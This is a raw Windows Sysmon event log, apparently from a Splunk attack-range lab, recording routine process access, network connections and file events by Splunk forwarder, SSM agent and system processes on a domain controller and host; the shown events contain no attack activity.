11:24:03.747{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.747{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1953-6216-6307-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.747{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1953-6216-6307-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.749{C8EA50B7-1953-6216-6307-000000003802}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.216{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=710EFE0E238AD66E512133EF7A164413,SHA256=6C6BBA124131EEB2D4305471F58AA49F6315128A0460FA09700E2243F2E5506C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:01.540{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51731-false10.0.1.12-8000- 23542300x8000000000000000298802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:04.218{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14B30207752635976AE19C9C08CB4D20,SHA256=4AAD926114DD476BE13E1107BA43C921BF48D024E0317100BA98FDAE4C44CA1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:05.225{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70472DEB7CB687F0B8FBBB867A0ABFD3,SHA256=EE257211FF87D067541D8046BF83CFFE404A47FB8F5D7293BDAC6CAF7C0E2635,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.561{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49564-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:03.561{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49564-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000298803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:05.218{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0618F13C821DC678D9432BE4010A616,SHA256=06240C5D3069D6F3E3B2B0997464BC6CE0E223C6BA13D4D7D263C08173E40926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:06.459{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4303434AF0A7370C37D789DB44D509,SHA256=5906E2A17F16CF6226E8E92478DEEF259143B8215CB76C444C0EC66AB97AE102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:06.250{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B60FC5B79437EE1AC77024035557F72D,SHA256=6F3D43AA5B1E012C680AFC3C347AABCC6FE477FCAAE0D9447A1646E5668AD220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:06.188{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-166MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:07.694{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEBC70314CD3965D667328663DD50183,SHA256=2D307E8EAC182383FF160BCED44E0B9B6A1B49F21F72F64F68FDDCFFDFD06DF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:04.701{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49565-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:07.257{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56E90A7D5DE708A709D2A912CA621BC4,SHA256=14ECAA97F35DEF817C2AB5396DCA4BEBD2B27B4F8F589A94C4F66742C9D63704,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:07.198{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-167MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:08.803{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9ADDEAB306CB8CCA7BA71EF6FBBEF41,SHA256=89F16234AA43B619EFEBFE4E53E040968A039BE2779373AC72D5A693F1085AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:08.264{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43EF95ADB88680999AE17A33D9314061,SHA256=88F6351B8EF7969ED0B2EBB704A185F35F62053695E0254B2E788C6263FE6C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:09.866{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F963A45B9ED7BA1ACE7EEC55D9D77A5F,SHA256=4EB0EB313326B78995D9FD57C294F4C72236174781759BB9CBB38E5254A8C31A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:09.283{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F0B7931DCF646653BA3360151F3FC1,SHA256=00CCFD8C664E57F8B7781A71A587C8CF9417C8F425E84F15DD7FA41C698D6EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:10.912{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A6A8987263C92DF742FC13225449EE7,SHA256=E021F143964AB8FEA11141E69BA59DD858A7B9B0F543D21C2F27C251A3F20F5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:10.302{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D01543F5C977270C3FD2D9DB4D3E483,SHA256=43D8C4ECAE19589CD5915B0BFA73B6A30CBA28BCEB5D4BBEF627D5C1ED725FAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:11.319{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78D06AE8362D4C02950E6EC2C940C4B1,SHA256=38DF2142EBBD1F18E2DE770698CA2AD7EE33929D09C63BDABC6CA17536AF8E87,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:07.493{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51732-false10.0.1.12-8000- 354300x8000000000000000298816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:10.598{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49566-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:12.334{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F369E0C3A62B614567A9B8B4518A12F,SHA256=898E2D7AAE4E4B5CFEB1792CA6D6AD12EB388DAD03FAAD8A12326A4BA463A653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:12.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47A8497F52703037EE7B25B917C31A29,SHA256=363C4A0147266441D79094376F23D7FD86AF28A12C4CB4D0A9511CDE0FABB96A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:13.349{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9B7D67351B2EE04FF6B3302449ED1C3,SHA256=3C36BDDD536013809A88CC004BFDE5321E5507FB2507D614EC82A9C9C3DA7E17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:13.100{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F67C58A3FEE3864637456DEE6DF104C,SHA256=0E3F2C64E2ADE537DDF75B0213EE2A7BFBE0584B47BE5A6FA109A63D2E94B8E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:14.365{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA9FFD9CD16AD88EF82FD451EEB48251,SHA256=6418B247AF7EF5700A005D16DC96BE54B65A416DF53AB63E0D043D5A7836367D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:14.115{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACE4D3FD7CCADC6C51EA9BED8BED2758,SHA256=691FE6175008F94D09D0368734C849286D38FA9F2B123F3C8F03E4C5C286DBEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:12.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51733-false10.0.1.12-8000- 23542300x8000000000000000222676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:15.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80ED10700E2054170CD568039E0D2CC8,SHA256=2C3FA14BE74F3B535DA930006F1BA677F435FD4B20D3A0E61DAC95B9835A2063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:15.380{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69AA9292DAFCF56E8993362F9B6FF5DD,SHA256=EE5DD43EB991B4D7D236F83A5863C114CFA0269CBFAEE7544392914D2A625928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:16.381{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0739218BD4A6360E7BFF4C47546D0316,SHA256=8ACC00054E275BEA175B5D357EA6AD28A6477C3C68F6BE92F2629AF0154D01CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:16.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC432CA25CFC145B236AD05D0B4D91E9,SHA256=F689C144105A25CDB7F21923FA443A5F4D1E7A52F2CDA929A28B8DA4970EBF4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:17.401{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C1608F496A9761EC864B7298AB9F30,SHA256=EC446B389C13D97DF37EDF93A4AAC942F0A2B60C1BB2D90343A1660425A9C746,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:17.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC32A94174D447A51BB7009CC07D6471,SHA256=43DCD8F0FEF8A0048DA5E390789F1E79A8B28C0FED19F8FA25272B569BF5FD95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:18.418{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF2E9D82DFF45534684BF2A419BD1705,SHA256=DD19A0273625CD787BF1B8FEAA01CDDDACE14E41AAD729A95EBB2BD80C557FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:18.162{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=114B9A220111130EE6D5D35BB06EAAD1,SHA256=359964F5DA83214C2476270BCA19829F310A122447E07A9DD7BA30674D5E5B0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.916{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1963-6216-6507-000000003802}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 